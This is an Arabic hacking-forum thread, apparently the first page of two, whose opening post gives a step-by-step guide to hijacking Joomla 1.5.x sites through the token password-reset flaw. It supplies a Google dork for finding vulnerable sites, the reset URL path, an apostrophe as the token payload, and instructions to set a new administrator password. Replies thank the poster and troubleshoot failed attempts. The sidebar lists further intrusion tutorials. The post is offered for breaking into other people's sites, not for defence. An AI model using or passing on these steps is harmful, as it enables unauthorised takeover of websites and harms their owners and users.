استغلال ثغرة سكربت جومله ===****** Joomla

استغلال ثغرة سكربت جومله ===****** Joomla


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: استغلال ثغرة سكربت جومله ===****** Joomla

  1. #1

    افتراضي استغلال ثغرة سكربت جومله ===****** Joomla

    اقدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله
    ****** Joomla===========


    Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

    الأصدارات المصابة 1.5.x


    نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن


    هسه ندخل على التطبيق ولبحث

    الدورك البحث
    تدخل تفتح الكوكل صديقنا Google

    وتكدب هاذا الكود الي هوه الدورك

    كود PHP:
    inurl:index.php?option=com_use
    طلعتنه هوايه مواقع مصابه
    تختار احد من هن

    هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب


    ندخل للموقع المصاب ونضيف هاذا المسار

    كود PHP:
    index.php?option=com_user&view=reset&layout=confir m
    يصير هيجي يعني

    كود PHP:
    http://www.XXXXXX.com/index.php?opti...layout=confirm
    راح يطلع مربع اسمة "token

    نخلي بل مربع هاذي العلامه النقطه

    '

    هسه راج يطلب منك باسورد جديد

    تكتب الباسورد الي تريده

    وتعيد كتابته مره لخ

    ومبرووك الاختراقق

    خوما صعبه ااذا صعبه كلولي

    نلقاكم بدرس اخررر
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  2. #2

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    بارك الله فيك يا مبدع . بالتوفيق

    لا اله الا الله محمد رسول الله




  3. #3

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مشكور حبي عالمرور
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  4. #4

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    يسلمووو

  5. #5

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مشكور اخوان على الردود
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



  6. #6

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مشكور حبيبي بس شغلة لما تحط ' تضغط على submit ???

  7. #7
    هكر متميز الصورة الرمزية hackerpk
    تاريخ التسجيل
    Jan 2013
    الدولة
    مغربي في اسبانيا
    المشاركات
    1,165

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    بارك الله فيك

  8. #8

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    جربتها اخى ولكن ما ظبطت معى على اكثر من موقع ويقول لى ان الرمز التأكيدى خطأ ولدى سؤال هل فى خانة اليوزر اكتب admin ‎‏ ولا اتركها فارغة وهل اكتب فى token‏ هذه النقطة . ام هذه ' وياريت يا اخى تقولى ليه مش عايزه تظبط معى وايه الاخطاء المحتملة؟

  9. #9

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    مكشور حبيب اخي
    بس الثغرة نسب النجاح فيا شوية ضئيلة
    لـن نرحم الضعفاء حتى يصبحوا اقوياء واذا اصبحوا اقوياء فلن تجوز الرحمة عليهم

    اذا مدت يدك لتمسني سأرفع قبعتي احتراماً لشجاعتك ولكن تأكد اني لن أنزلها إلا على قبرك


    يوجد ايميلات ثلاثية للمبادلة



  10. #10

    افتراضي رد: استغلال ثغرة سكربت جومله ===****** Joomla

    اه بالنسبه لها قليله وكثير مواقع رقعتها ولكن في كم موقع عالعموم تضعون في الخانة ' اذا منجحت مرقعه
    معهد شموخ العرب

    لتطوير وبرمجة المنتديات



صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح ثغرة SQL Injection بسيكربت Joomla (بالشرح الممل)
    بواسطة ahmedfreed في المنتدى قسم الثغرات
    مشاركات: 18
    آخر مشاركة: 04-15-2013, 01:49 AM
  2. ثغرة. Joomla com_collector Component Arbitrary File Upload Vulnerability
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 01-21-2013, 04:18 PM
  3. |ألدرس الثاني والعشرون| كيفية رفع شل من سكربت جوملا Joomla
    بواسطة QtRoNiX FoX في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 11
    آخر مشاركة: 09-21-2012, 06:57 PM
  4. استغلال ثغرة الاهدائات
    بواسطة HuNtEr2 في المنتدى قسم الثغرات
    مشاركات: 21
    آخر مشاركة: 11-10-2010, 02:44 AM
  5. سؤال في مسار ملف config في سكربت joomla
    بواسطة HaKiMCoM في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 2
    آخر مشاركة: 01-17-2010, 07:49 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •